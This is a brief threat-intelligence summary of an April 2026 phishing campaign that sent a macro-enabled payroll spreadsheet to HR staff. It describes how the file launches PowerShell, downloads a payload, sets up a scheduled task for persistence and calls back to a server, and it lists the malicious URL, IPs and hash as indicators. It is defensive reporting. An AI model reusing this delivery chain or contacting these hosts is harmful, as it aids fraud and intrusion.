Phishing Email Delivering Macro-Enabled Spreadsheet for Payroll Fraud

On 13 April 2026 HR and payroll staff at a professional services firm were targeted by a phishing campaign delivering a macro-enabled spreadsheet (Salary_Adjustment_Q2_2026.xlsm) from hr-notifications@employeeportal-support.com; when macros were enabled the document launched PowerShell to download an additional payload from http://194.5.249.201/files/update.dat, dropped C:\Users\Public\Libraries\cacheupd.exe, created a scheduled task named OfficeBackgroundSync, and initiated callbacks to 89.44.9.118 — observed IOCs include the sender address, attachment name, download URL, callback IP, scheduled task, and SHA256 3b6e2df4b7d85d0d8ef1db4c99d13a4f4f18aeb6fc4a0d11c0c0f447a80c9912.